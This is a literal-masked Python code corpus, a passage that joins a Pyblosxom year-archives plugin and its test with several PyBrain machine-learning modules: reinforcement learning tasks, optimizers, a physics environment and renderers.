YearArchives ( request ) <EOL> def cb_date_head ( args ) : <EOL> request = args [ "<STR_LIT>" ] <EOL> data = request . get_data ( ) <EOL> if INIT_KEY in data : <EOL> args [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> return args <EOL> def parse_path_info ( path ) : <EOL> """<STR_LIT>""" <EOL> path = path . split ( "<STR_LIT:/>" ) <EOL> path = [ m for m in path if m ] <EOL> if not path : <EOL> return <EOL> year = path [ <NUM_LIT:0> ] <EOL> if not year . isdigit ( ) or not len ( year ) == <NUM_LIT:4> : <EOL> return <EOL> if len ( path ) == <NUM_LIT:1> : <EOL> return ( year , None ) <EOL> if len ( path ) == <NUM_LIT:2> and path [ <NUM_LIT:1> ] . startswith ( "<STR_LIT:index>" ) : <EOL> flav = None <EOL> if "<STR_LIT:.>" in path [ <NUM_LIT:1> ] : <EOL> flav = path [ <NUM_LIT:1> ] . split ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:1> ] <EOL> return ( year , flav ) <EOL> return <EOL> def cb_filelist ( args ) : <EOL> request = args [ "<STR_LIT>" ] <EOL> pyhttp = request . get_http ( ) <EOL> data = request . get_data ( ) <EOL> config = request . get_configuration ( ) <EOL> baseurl = config . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> path = pyhttp [ "<STR_LIT>" ] <EOL> ret = parse_path_info ( path ) <EOL> if ret == None : <EOL> return <EOL> year , flavour = ret <EOL> data [ INIT_KEY ] = <NUM_LIT:1> <EOL> wa = YearArchives ( request ) <EOL> wa . gen_linear_archive ( ) <EOL> items = wa . _items <EOL> items = [ m for m in items if m [ <NUM_LIT:0> ] . startswith ( year ) ] <EOL> items . sort ( ) <EOL> items . reverse ( ) <EOL> if not flavour : <EOL> flavour = data . get ( <EOL> "<STR_LIT>" , config . get ( "<STR_LIT>" , "<STR_LIT:html>" ) ) <EOL> data [ "<STR_LIT>" ] = flavour <EOL> l = ( "<STR_LIT>" + baseurl + <EOL> "<STR_LIT>" + flavour + "<STR_LIT>" ) <EOL> e = "<STR_LIT>" <EOL> d = "<STR_LIT>" <EOL> m = "<STR_LIT>" <EOL> day = [ ] <EOL> month = [ ] <EOL> entrylist = [ ] <EOL> for mem in items : <EOL> if not m : <EOL> m = mem [ <NUM_LIT:0> ] <EOL> if not d : <EOL> d = mem [ <NUM_LIT:1> ] <EOL> if m != mem [ <NUM_LIT:0> ] : <EOL> month . append ( e % ( d , "<STR_LIT:\n>" . join ( day ) ) ) <EOL> entrylist . append ( new_entry ( request , m , "<STR_LIT:\n>" . join ( month ) ) ) <EOL> m = mem [ <NUM_LIT:0> ] <EOL> d = mem [ <NUM_LIT:1> ] <EOL> day = [ ] <EOL> month = [ ] <EOL> elif d != mem [ <NUM_LIT:1> ] : <EOL> month . append ( e % ( d , "<STR_LIT:\n>" . join ( day ) ) ) <EOL> d = mem [ <NUM_LIT:1> ] <EOL> day = [ ] <EOL> entry = entries . fileentry . FileEntry ( <EOL> request , mem [ <NUM_LIT:3> ] , config [ '<STR_LIT>' ] ) <EOL> day . append ( l % entry ) <EOL> if day : <EOL> month . append ( e % ( d , "<STR_LIT:\n>" . join ( day ) ) ) <EOL> if month : <EOL> entrylist . append ( new_entry ( request , m , "<STR_LIT:\n>" . join ( month ) ) ) <EOL> return entrylist </s>
<s> import time <EOL> import os <EOL> from Pyblosxom . tests import PluginTest , TIMESTAMP <EOL> from Pyblosxom . plugins import yeararchives <EOL> class Test_yeararchives ( PluginTest ) : <EOL> def setUp ( self ) : <EOL> PluginTest . setUp ( self , yeararchives ) <EOL> def tearDown ( self ) : <EOL> PluginTest . tearDown ( self ) <EOL> def test_parse_path_info ( self ) : <EOL> for testin , testout in [ <EOL> ( "<STR_LIT>" , None ) , <EOL> ( "<STR_LIT:/>" , None ) , <EOL> ( "<STR_LIT>" , ( "<STR_LIT>" , None ) ) , <EOL> ( "<STR_LIT>" , ( "<STR_LIT>" , None ) ) , <EOL> ( "<STR_LIT>" , ( "<STR_LIT>" , None ) ) , <EOL> ( "<STR_LIT>" , ( "<STR_LIT>" , "<STR_LIT>" ) ) , <EOL> ] : <EOL> self . assertEquals ( yeararchives . parse_path_info ( testin ) , <EOL> testout ) </s>
<s> __author__ = "<STR_LIT>" <EOL> __version__ = '<STR_LIT>' <EOL> from pybrain . tools . example_tools import ExTools <EOL> from pybrain . tools . shortcuts import buildNetwork <EOL> from pybrain . rl . environments . cartpole import CartPoleEnvironment , BalanceTask <EOL> from pybrain . rl . agents import LearningAgent <EOL> from pybrain . rl . learners import Reinforce <EOL> from pybrain . rl . experiments import EpisodicExperiment <EOL> batch = <NUM_LIT:50> <EOL> prnts = <NUM_LIT:4> <EOL> epis = <NUM_LIT> / batch / prnts <EOL> numbExp = <NUM_LIT:10> <EOL> et = ExTools ( batch , prnts , kind = "<STR_LIT>" ) <EOL> for runs in range ( numbExp ) : <EOL> env = CartPoleEnvironment ( ) <EOL> task = BalanceTask ( env , <NUM_LIT:200> , desiredValue = None ) <EOL> net = buildNetwork ( <NUM_LIT:4> , <NUM_LIT:1> , bias = False ) <EOL> agent = LearningAgent ( net , Reinforce ( ) ) <EOL> et . agent = agent <EOL> experiment = EpisodicExperiment ( task , agent ) <EOL> for updates in range ( epis ) : <EOL> for i in range ( prnts ) : <EOL> experiment . doEpisodes ( batch ) <EOL> state , action , reward = agent . learner . dataset . getSequence ( agent . learner . dataset . getNumSequences ( ) - <NUM_LIT:1> ) <EOL> et . printResults ( reward . sum ( ) , runs , updates ) <EOL> et . addExps ( ) <EOL> et . showExps ( ) </s>
<s> from __future__ import print_function <EOL> __author__ = "<STR_LIT>" <EOL> __version__ = '<STR_LIT>' <EOL> from pylab import figure , ioff , clf , contourf , ion , draw , show <EOL> from pybrain . utilities import percentError <EOL> from pybrain . tools . shortcuts import buildNetwork <EOL> from pybrain . supervised . trainers import BackpropTrainer <EOL> from pybrain . structure . modules import SoftmaxLayer <EOL> from . datasets import generateGridData , generateClassificationData , plotData <EOL> trndata = generateClassificationData ( <NUM_LIT> ) <EOL> trndata . _convertToOneOfMany ( bounds = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> tstdata = generateClassificationData ( <NUM_LIT:100> ) <EOL> tstdata . _convertToOneOfMany ( bounds = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> fnn = buildNetwork ( trndata . indim , <NUM_LIT:5> , trndata . outdim , outclass = SoftmaxLayer ) <EOL> trainer = BackpropTrainer ( fnn , dataset = trndata , momentum = <NUM_LIT:0.1> , verbose = True , weightdecay = <NUM_LIT> ) <EOL> griddata , X , Y = generateGridData ( [ - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> for i in range ( <NUM_LIT:20> ) : <EOL> trainer . trainEpochs ( <NUM_LIT:1> ) <EOL> trnresult = percentError ( trainer . testOnClassData ( ) , <EOL> trndata [ '<STR_LIT:class>' ] ) <EOL> tstresult = percentError ( trainer . testOnClassData ( <EOL> dataset = tstdata ) , tstdata [ '<STR_LIT:class>' ] ) <EOL> print ( "<STR_LIT>" % trainer . totalepochs , "<STR_LIT>" % trnresult , "<STR_LIT>" % tstresult ) <EOL> out = fnn . activateOnDataset ( griddata ) <EOL> out = out . argmax ( axis = <NUM_LIT:1> ) <EOL> out = out . reshape ( X . shape ) <EOL> figure ( <NUM_LIT:1> ) <EOL> ioff ( ) <EOL> clf ( ) <EOL> plotData ( tstdata ) <EOL> if out . max ( ) != out . min ( ) : <EOL> CS = contourf ( X , Y , out ) <EOL> ion ( ) <EOL> draw ( ) <EOL> ioff ( ) <EOL> show ( ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from pybrain . optimization . optimizer import ContinuousOptimizer <EOL> class DistributionBasedOptimizer ( ContinuousOptimizer ) : <EOL> """<STR_LIT>""" <EOL> online = False <EOL> batchSize = <NUM_LIT:100> <EOL> GAUSSIAN = <NUM_LIT:1> <EOL> CAUCHY = <NUM_LIT:2> <EOL> GENERALIZEDGAUSSIAN = <NUM_LIT:3> <EOL> STUDENTT = <NUM_LIT:4> <EOL> distributionType = GAUSSIAN <EOL> storeAllDistributions = False <EOL> def _updateDistribution ( self , dparamDeltas ) : <EOL> """<STR_LIT>""" <EOL> def _generateSample ( self ) : <EOL> """<STR_LIT>""" <EOL> def _generateConformingBatch ( self ) : <EOL> """<STR_LIT>""" </s>
<s> __author__ = '<STR_LIT>' <EOL> from scipy import array <EOL> from pybrain . optimization . optimizer import BlackBoxOptimizer <EOL> from pybrain . optimization . populationbased . ga import GA <EOL> from pybrain . tools . nondominated import const_non_dominated_front , const_crowding_distance , const_non_dominated_sort <EOL> class ConstMultiObjectiveGA ( GA ) : <EOL> """<STR_LIT>""" <EOL> topProportion = <NUM_LIT:0.5> <EOL> elitism = True <EOL> populationSize = <NUM_LIT:100> <EOL> mutationStdDev = <NUM_LIT:1.> <EOL> allowEquality = True <EOL> mustMaximize = True <EOL> def _learnStep ( self ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( self . fitnesses , dict ) : <EOL> oldfitnesses = self . fitnesses <EOL> self . fitnesses = dict ( ) <EOL> for indiv in self . currentpop : <EOL> if tuple ( indiv ) in oldfitnesses : <EOL> self . fitnesses [ tuple ( indiv ) ] = oldfitnesses [ tuple ( indiv ) ] <EOL> else : <EOL> self . fitnesses [ tuple ( indiv ) ] = self . _oneEvaluation ( indiv ) <EOL> del oldfitnesses <EOL> else : <EOL> self . fitnesses = dict ( [ ( tuple ( indiv ) , self . _oneEvaluation ( indiv ) ) for indiv in self . currentpop ] ) <EOL> if self . storeAllPopulations : <EOL> self . _allGenerations . append ( ( self . currentpop , self . fitnesses ) ) <EOL> if self . elitism : <EOL> self . bestEvaluable = list ( const_non_dominated_front ( list ( map ( tuple , self . currentpop ) ) , <EOL> key = lambda x : self . fitnesses [ x ] , <EOL> allowequality = self . allowEquality ) ) <EOL> else : <EOL> self . bestEvaluable = list ( const_non_dominated_front ( list ( map ( tuple , self . currentpop ) ) + self . bestEvaluable , <EOL> key = lambda x : self . fitnesses [ x ] , <EOL> allowequality = self . allowEquality ) ) <EOL> self . bestEvaluation = [ self . fitnesses [ indiv ] for indiv in self . bestEvaluable ] <EOL> self . produceOffspring ( ) <EOL> def select ( self ) : <EOL> return list ( map ( array , nsga2select ( list ( map ( tuple , self . currentpop ) ) , self . fitnesses , <EOL> self . selectionSize , self . allowEquality ) ) ) <EOL> def nsga2select ( population , fitnesses , survivors , allowequality = True ) : <EOL> """<STR_LIT>""" <EOL> fronts = const_non_dominated_sort ( population , <EOL> key = lambda x : fitnesses [ x ] , <EOL> allowequality = allowequality ) <EOL> individuals = set ( ) <EOL> for front in fronts : <EOL> remaining = survivors - len ( individuals ) <EOL> if not remaining > <NUM_LIT:0> : <EOL> break <EOL> if len ( front ) > remaining : <EOL> crowd_dist = const_crowding_distance ( front , fitnesses ) <EOL> front = sorted ( front , key = lambda x : crowd_dist [ x ] , reverse = True ) <EOL> front = set ( front [ : remaining ] ) <EOL> individuals |= front <EOL> return list ( individuals ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from . import sensors <EOL> import threading <EOL> from pybrain . utilities import threaded <EOL> from pybrain . tools . networking . udpconnection import UDPServer <EOL> from pybrain . rl . environments . environment import Environment <EOL> from scipy import ones , zeros , array , clip , arange , sqrt <EOL> from time import sleep <EOL> class FlexCubeEnvironment ( Environment ) : <EOL> def __init__ ( self , render = True , realtime = True , ip = "<STR_LIT:127.0.0.1>" , port = "<STR_LIT>" ) : <EOL> self . render = render <EOL> if self . render : <EOL> self . updateDone = True <EOL> self . updateLock = threading . Lock ( ) <EOL> self . server = UDPServer ( ip , port ) <EOL> self . actLen = <NUM_LIT:12> <EOL> self . mySensors = sensors . Sensors ( [ "<STR_LIT>" ] ) <EOL> self . dists = array ( [ <NUM_LIT> , sqrt ( <NUM_LIT> ) * <NUM_LIT:20> , sqrt ( <NUM_LIT> ) * <NUM_LIT:20> ] ) <EOL> self . gravVect = array ( [ <NUM_LIT:0.0> , - <NUM_LIT> , <NUM_LIT:0.0> ] ) <EOL> self . centerOfGrav = zeros ( ( <NUM_LIT:1> , <NUM_LIT:3> ) , float ) <EOL> self . pos = ones ( ( <NUM_LIT:8> , <NUM_LIT:3> ) , float ) <EOL> self . vel = zeros ( ( <NUM_LIT:8> , <NUM_LIT:3> ) , float ) <EOL> self . SpringM = ones ( ( <NUM_LIT:8> , <NUM_LIT:8> ) , float ) <EOL> self . d = <NUM_LIT> <EOL> self . dt = <NUM_LIT> <EOL> self . startHight = <NUM_LIT> <EOL> self . dumping = <NUM_LIT> <EOL> self . fraktMin = <NUM_LIT> <EOL> self . fraktMax = <NUM_LIT> <EOL> self . minAkt = self . dists [ <NUM_LIT:0> ] * self . fraktMin <EOL> self . maxAkt = self . dists [ <NUM_LIT:0> ] * self . fraktMax <EOL> self . reset ( ) <EOL> self . count = <NUM_LIT:0> <EOL> self . setEdges ( ) <EOL> self . act ( array ( [ <NUM_LIT> ] * <NUM_LIT:12> ) ) <EOL> self . euler ( ) <EOL> self . realtime = realtime <EOL> self . step = <NUM_LIT:0> <EOL> def closeSocket ( self ) : <EOL> self . server . UDPInSock . close ( ) <EOL> sleep ( <NUM_LIT:10> ) <EOL> def setEdges ( self ) : <EOL> self . edges = zeros ( ( <NUM_LIT:12> , <NUM_LIT:2> ) , int ) <EOL> count = <NUM_LIT:0> <EOL> c1 = <NUM_LIT:0> <EOL> for i in range ( <NUM_LIT:2> ) : <EOL> for j in range ( <NUM_LIT:2> ) : <EOL> for k in range ( <NUM_LIT:2> ) : <EOL> c2 = <NUM_LIT:0> <EOL> for i2 in range ( <NUM_LIT:2> ) : <EOL> for j2 in range ( <NUM_LIT:2> ) : <EOL> for k2 in range ( <NUM_LIT:2> ) : <EOL> sum = abs ( i - i2 ) + abs ( j - j2 ) + abs ( k - k2 ) <EOL> if sum == <NUM_LIT:1> and i <= i2 and j <= j2 and k <= k2 : <EOL> self . edges [ count ] = [ c1 , c2 ] <EOL> count += <NUM_LIT:1> <EOL> c2 += <NUM_LIT:1> <EOL> c1 += <NUM_LIT:1> <EOL> def reset ( self ) : <EOL> self . action = ones ( ( <NUM_LIT:1> , <NUM_LIT:12> ) , float ) * self . dists [ <NUM_LIT:0> ] <EOL> for i in range ( <NUM_LIT:2> ) : <EOL> for j in range ( <NUM_LIT:2> ) : <EOL> for k in range ( <NUM_LIT:2> ) : <EOL> self . pos [ i * <NUM_LIT:4> + j * <NUM_LIT:2> + k ] = [ i * self . dists [ <NUM_LIT:0> ] - self . dists [ <NUM_LIT:0> ] / <NUM_LIT> , j * self . dists [ <NUM_LIT:0> ] - self . dists [ <NUM_LIT:0> ] / <NUM_LIT> + self . startHight , k * self . dists [ <NUM_LIT:0> ] - self . dists [ <NUM_LIT:0> ] / <NUM_LIT> ] <EOL> self . vel = zeros ( ( <NUM_LIT:8> , <NUM_LIT:3> ) , float ) <EOL> idx0 = arange ( <NUM_LIT:8> ) . repeat ( <NUM_LIT:8> ) <EOL> idx1 = array ( list ( range ( <NUM_LIT:8> ) ) * <NUM_LIT:8> ) <EOL> self . difM = self . pos [ idx0 , : ] - self . pos [ idx1 , : ] <EOL> self . springM = sqrt ( ( self . difM ** <NUM_LIT:2> ) . sum ( axis = <NUM_LIT:1> ) ) . reshape ( <NUM_LIT:64> , <NUM_LIT:1> ) <EOL> self . distM = self . springM . copy ( ) <EOL> self . step = <NUM_LIT:0> <EOL> self . mySensors . updateSensor ( self . pos , self . vel , self . distM , self . centerOfGrav , self . step , self . action ) <EOL> if self . render : <EOL> if self . server . clients > <NUM_LIT:0> : <EOL> self . server . send ( [ "<STR_LIT:r>" , "<STR_LIT:r>" ] ) <EOL> def performAction ( self , action ) : <EOL> action = self . normAct ( action ) <EOL> self . action = action . copy ( ) <EOL> self . act ( action ) <EOL> self . euler ( ) <EOL> self . step += <NUM_LIT:1> <EOL> if self . render : <EOL> if self . updateDone : <EOL> self . updateRenderer ( ) <EOL> if self . server . clients > <NUM_LIT:0> and self . realtime : <EOL> sleep ( <NUM_LIT> ) <EOL> def getSensors ( self ) : <EOL> self . mySensors . updateSensor ( self . pos , self . vel , self . distM , self . centerOfGrav , self . step , self . action ) <EOL> return self . mySensors . getSensor ( ) [ : ] <EOL> def normAct ( self , s ) : <EOL> return clip ( s , self . minAkt , self . maxAkt ) <EOL> def act ( self , a ) : <EOL> count = <NUM_LIT:0> <EOL> for i in self . edges : <EOL> self . springM [ i [ <NUM_LIT:0> ] * <NUM_LIT:8> + i [ <NUM_LIT:1> ] ] = a [ count ] <EOL> self . springM [ i [ <NUM_LIT:1> ] * <NUM_LIT:8> + i [ <NUM_LIT:0> ] ] = a [ count ] <EOL> count += <NUM_LIT:1> <EOL> def euler ( self ) : <EOL> self . count += <NUM_LIT:1> <EOL> distM = self . distM . copy ( ) <EOL> disM = self . springM - distM <EOL> disM = disM . reshape ( <NUM_LIT:64> , <NUM_LIT:1> ) <EOL> distM = distM + <NUM_LIT> <EOL> vel = self . difM / distM <EOL> vel *= disM * self . d * self . dt <EOL> idx2 = arange ( <NUM_LIT:8> ) <EOL> for i in range ( <NUM_LIT:8> ) : <EOL> self . vel [ i ] += vel [ idx2 + i * <NUM_LIT:8> , : ] . sum ( axis = <NUM_LIT:0> ) <EOL> self . vel += self . gravVect * self . dt <EOL> self . vel -= self . vel * self . dumping * self . dt <EOL> self . pos += self . dt * self . vel <EOL> for i in range ( <NUM_LIT:8> ) : <EOL> if self . pos [ i ] [ <NUM_LIT:1> ] < <NUM_LIT:0.0> : <EOL> self . pos [ i ] [ <NUM_LIT:1> ] = <NUM_LIT:0.0> <EOL> self . vel [ i ] = self . vel [ i ] * [ <NUM_LIT:0.0> , - <NUM_LIT:1.0> , <NUM_LIT:0.0> ] <EOL> self . centerOfGrav = self . pos . sum ( axis = <NUM_LIT:0> ) / <NUM_LIT> <EOL> idx0 = arange ( <NUM_LIT:8> ) . repeat ( <NUM_LIT:8> ) <EOL> idx1 = array ( list ( range ( <NUM_LIT:8> ) ) * <NUM_LIT:8> ) <EOL> self . difM = self . pos [ idx0 , : ] - self . pos [ idx1 , : ] <EOL> self . distM = sqrt ( ( self . difM ** <NUM_LIT:2> ) . sum ( axis = <NUM_LIT:1> ) ) . reshape ( <NUM_LIT:64> , <NUM_LIT:1> ) <EOL> @ threaded ( ) <EOL> def updateRenderer ( self ) : <EOL> self . updateDone = False <EOL> if not self . updateLock . acquire ( False ) : return <EOL> self . server . listen ( ) <EOL> if self . server . clients > <NUM_LIT:0> : <EOL> self . server . send ( repr ( [ self . pos , self . centerOfGrav ] ) ) <EOL> sleep ( <NUM_LIT> ) <EOL> self . updateLock . release ( ) <EOL> self . updateDone = True </s>
<s> __author__ = '<STR_LIT>' <EOL> from scipy import array , zeros <EOL> from random import choice <EOL> from . maze import MazeTask <EOL> class TMaze ( MazeTask ) : <EOL> """<STR_LIT>""" <EOL> discount = <NUM_LIT> <EOL> observations = <NUM_LIT:4> <EOL> finalReward = <NUM_LIT:4> <EOL> bangPenalty = - <NUM_LIT:0.1> <EOL> length = <NUM_LIT:10> <EOL> def __init__ ( self , ** args ) : <EOL> self . initPos = [ ( <NUM_LIT:2> , <NUM_LIT:1> ) ] <EOL> self . setArgs ( ** args ) <EOL> columns = [ [ <NUM_LIT:1> ] * <NUM_LIT:5> ] <EOL> for dummy in range ( self . length ) : <EOL> columns . append ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> columns . append ( [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> columns . append ( [ <NUM_LIT:1> ] * <NUM_LIT:5> ) <EOL> self . topology = array ( columns ) . T <EOL> MazeTask . __init__ ( self , ** args ) <EOL> def reset ( self ) : <EOL> MazeTask . reset ( self ) <EOL> goUp = choice ( [ True , False ] ) <EOL> self . specialObs = goUp <EOL> if goUp : <EOL> self . env . goal = ( <NUM_LIT:3> , self . length + <NUM_LIT:1> ) <EOL> else : <EOL> self . env . goal = ( <NUM_LIT:1> , self . length + <NUM_LIT:1> ) <EOL> def getObservation ( self ) : <EOL> res = zeros ( <NUM_LIT:4> ) <EOL> if self . env . perseus == self . env . initPos [ <NUM_LIT:0> ] : <EOL> if self . specialObs : <EOL> res [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> else : <EOL> res [ <NUM_LIT:1> ] = <NUM_LIT:1> <EOL> elif self . env . perseus [ <NUM_LIT:1> ] == self . length + <NUM_LIT:1> : <EOL> res [ <NUM_LIT:2> ] = <NUM_LIT:1> <EOL> else : <EOL> res [ <NUM_LIT:3> ] = <NUM_LIT:1> <EOL> return res <EOL> def getReward ( self ) : <EOL> if self . env . perseus [ <NUM_LIT:1> ] == self . length + <NUM_LIT:1> : <EOL> if abs ( self . env . perseus [ <NUM_LIT:0> ] - self . env . goal [ <NUM_LIT:0> ] ) == <NUM_LIT:2> : <EOL> self . env . perseus = self . env . goal <EOL> return self . bangPenalty <EOL> return MazeTask . getReward ( self ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from pylab import plot , figure , ion , Line2D , draw , arange <EOL> from pybrain . rl . environments . renderer import Renderer <EOL> import threading <EOL> import time <EOL> class SimpleRenderer ( Renderer ) : <EOL> def __init__ ( self ) : <EOL> Renderer . __init__ ( self ) <EOL> self . dataLock = threading . Lock ( ) <EOL> self . stopRequest = False <EOL> self . pathx = [ ] <EOL> self . pathy = [ ] <EOL> self . f = None <EOL> self . min = - <NUM_LIT:1> <EOL> self . max = <NUM_LIT:1> <EOL> self . fig = None <EOL> self . color = '<STR_LIT>' <EOL> def setFunction ( self , f , rmin , rmax ) : <EOL> self . dataLock . acquire ( ) <EOL> self . f = f <EOL> self . min = rmin <EOL> self . max = rmax <EOL> self . dataLock . release ( ) <EOL> def updateData ( self , data ) : <EOL> self . dataLock . acquire ( ) <EOL> ( x , y ) = data <EOL> self . pathx . append ( x ) <EOL> self . pathy . append ( y ) <EOL> self . dataLock . release ( ) <EOL> def reset ( self ) : <EOL> self . dataLock . acquire ( ) <EOL> self . pathx = [ ] <EOL> self . pathy = [ ] <EOL> self . dataLock . release ( ) <EOL> def stop ( self ) : <EOL> self . dataLock . acquire ( ) <EOL> self . stopRequest = True <EOL> self . dataLock . release ( ) <EOL> def start ( self ) : <EOL> self . drawPlot ( ) <EOL> Renderer . start ( self ) <EOL> def drawPlot ( self ) : <EOL> ion ( ) <EOL> self . fig = figure ( ) <EOL> axes = self . fig . add_subplot ( <NUM_LIT> ) <EOL> xvalues = arange ( self . min , self . max , <NUM_LIT:0.1> ) <EOL> yvalues = list ( map ( self . f , xvalues ) ) <EOL> plot ( xvalues , yvalues ) <EOL> self . line = Line2D ( [ ] , [ ] , linewidth = <NUM_LIT:3> , color = '<STR_LIT>' ) <EOL> axes . add_artist ( self . line ) <EOL> self . line . set_clip_box ( axes . bbox ) <EOL> axes . set_xlim ( min ( xvalues ) - <NUM_LIT:0.5> , max ( xvalues ) + <NUM_LIT:0.5> ) <EOL> axes . set_ylim ( min ( yvalues ) - <NUM_LIT:0.5> , max ( yvalues ) + <NUM_LIT:0.5> ) <EOL> def _render ( self ) : <EOL> while not self . stopRequest : <EOL> self . dataLock . acquire ( ) <EOL> self . line . set_data ( self . pathx , self . pathy ) <EOL> self . line . set_color ( self . color ) <EOL> figure ( self . fig . number ) <EOL> draw ( ) <EOL> self . dataLock . release ( ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> self . stopRequest = False </s>
<s> from __future__ import print_function <EOL> __author__ = '<STR_LIT>' <EOL> from . capturetask import CaptureGameTask <EOL> from pybrain . rl . environments . twoplayergames . capturegameplayers import ModuleDecidingPlayer <EOL> from pybrain . rl . environments . twoplayergames import CaptureGame <EOL> from pybrain . rl . environments . twoplayergames . capturegameplayers . captureplayer import CapturePlayer <EOL> from pybrain . structure . networks . custom . capturegame import CaptureGameNetwork <EOL> class RelativeCaptureTask ( CaptureGameTask ) : <EOL> """<STR_LIT>""" <EOL> useNetworks = False <EOL> maxGames = <NUM_LIT:3> <EOL> presetGamesProportion = <NUM_LIT:0.5> <EOL> minTemperature = <NUM_LIT:0> <EOL> maxTemperature = <NUM_LIT> <EOL> verbose = False <EOL> numMovesCoeff = <NUM_LIT:0.5> <EOL> def __init__ ( self , size , ** args ) : <EOL> self . setArgs ( ** args ) <EOL> self . size = size <EOL> self . task = CaptureGameTask ( self . size ) <EOL> self . env = self . task . env <EOL> if self . presetGamesProportion > <NUM_LIT:0> : <EOL> self . sPos = self . _fixedStartingPos ( ) <EOL> self . cases = int ( len ( self . sPos ) / self . presetGamesProportion ) <EOL> else : <EOL> self . cases = <NUM_LIT:1> <EOL> self . maxmoves = self . size * self . size <EOL> self . minmoves = <NUM_LIT:3> <EOL> def __call__ ( self , p1 , p2 ) : <EOL> self . temp = self . minTemperature <EOL> if self . useNetworks : <EOL> p1 = ModuleDecidingPlayer ( p1 , self . task . env , temperature = self . temp ) <EOL> p2 = ModuleDecidingPlayer ( p2 , self . task . env , temperature = self . temp ) <EOL> else : <EOL> assert isinstance ( p1 , CapturePlayer ) <EOL> assert isinstance ( p2 , CapturePlayer ) <EOL> p1 . game = self . task . env <EOL> p2 . game = self . task . env <EOL> p1 . color = CaptureGame . BLACK <EOL> p2 . color = - p1 . color <EOL> self . player = p1 <EOL> self . opponent = p2 <EOL> coeffSum = <NUM_LIT:0.> <EOL> score = <NUM_LIT:0.> <EOL> np = int ( self . cases * ( <NUM_LIT:1> - self . presetGamesProportion ) ) <EOL> for i in range ( self . maxGames ) : <EOL> coeff = <NUM_LIT:1> / ( <NUM_LIT:10> * self . temp + <NUM_LIT:1> ) <EOL> preset = None <EOL> if self . cases > <NUM_LIT:1> : <EOL> if i % self . cases >= np : <EOL> preset = self . sPos [ ( i - np ) % self . cases ] <EOL> elif i < self . cases : <EOL> if i == <NUM_LIT:0> : <EOL> coeff *= np <EOL> else : <EOL> continue <EOL> res = self . _oneGame ( preset ) <EOL> score += coeff * res <EOL> coeffSum += coeff <EOL> if self . cases == <NUM_LIT:1> or ( i % self . cases == <NUM_LIT:0> and i > <NUM_LIT:0> ) : <EOL> self . _globalWarming ( ) <EOL> return score / coeffSum <EOL> def _globalWarming ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . temp == <NUM_LIT:0> : <EOL> self . temp = <NUM_LIT> <EOL> else : <EOL> self . temp *= <NUM_LIT> <EOL> if self . temp > self . maxTemperature : <EOL> return False <EOL> elif self . _setTemperature ( ) == False : <EOL> self . temp = self . minTemperature <EOL> return False <EOL> return True <EOL> def _setTemperature ( self ) : <EOL> if self . useNetworks : <EOL> self . opponent . temperature = self . temp <EOL> self . player . temperature = self . temp <EOL> return True <EOL> elif hasattr ( self . opponent , '<STR_LIT>' ) : <EOL> randPart = self . temp / ( self . temp + <NUM_LIT:1> ) <EOL> self . opponent . randomPartMoves = randPart <EOL> self . player . randomPartMoves = randPart <EOL> return True <EOL> else : <EOL> return False <EOL> def _fixedStartingPos ( self ) : <EOL> """<STR_LIT>""" <EOL> res = [ ] <EOL> if self . size < <NUM_LIT:3> : <EOL> return res <EOL> for x in range ( <NUM_LIT:1> , ( self . size + <NUM_LIT:1> ) // <NUM_LIT:2> ) : <EOL> for y in range ( x , ( self . size + <NUM_LIT:1> ) // <NUM_LIT:2> ) : <EOL> res . append ( ( x , y ) ) <EOL> return res <EOL> def _oneGame ( self , preset = None ) : <EOL> """<STR_LIT>""" <EOL> self . env . reset ( ) <EOL> if preset != None : <EOL> self . env . _setStone ( CaptureGame . BLACK , preset ) <EOL> self . env . movesDone += <NUM_LIT:1> <EOL> self . env . playToTheEnd ( self . opponent , self . player ) <EOL> else : <EOL> self . env . playToTheEnd ( self . player , self . opponent ) <EOL> moves = self . env . movesDone <EOL> win = self . env . winner == self . player . color <EOL> if self . verbose : <EOL> print ( ( '<STR_LIT>' , preset , '<STR_LIT>' , self . temp , '<STR_LIT>' , win , '<STR_LIT>' , moves , '<STR_LIT>' ) ) <EOL> res = <NUM_LIT:1> - self . numMovesCoeff * ( moves - self . minmoves ) / ( self . maxmoves - self . minmoves ) <EOL> if win : <EOL> return res <EOL> else : <EOL> return - res <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> assert RelativeCaptureTask ( <NUM_LIT:5> ) . _fixedStartingPos ( ) == [ ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:2> , <NUM_LIT:2> ) ] <EOL> assert RelativeCaptureTask ( <NUM_LIT:8> ) . _fixedStartingPos ( ) == [ ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , ( <NUM_LIT:2> , <NUM_LIT:2> ) , ( <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:3> , <NUM_LIT:3> ) ] <EOL> net1 = CaptureGameNetwork ( hsize = <NUM_LIT:1> ) <EOL> net2 = CaptureGameNetwork ( hsize = <NUM_LIT:1> ) <EOL> r = RelativeCaptureTask ( <NUM_LIT:5> , maxGames = <NUM_LIT> , useNetworks = True , <EOL> presetGamesProportion = <NUM_LIT:0.5> ) <EOL> print ( ( r ( net1 , net2 ) ) ) <EOL> print ( ( r ( net2 , net1 ) ) ) <EOL> r . maxGames = <NUM_LIT:200> <EOL> print ( ( r ( net1 , net2 ) ) ) <EOL> print ( ( r ( net2 , net1 ) ) ) </s>
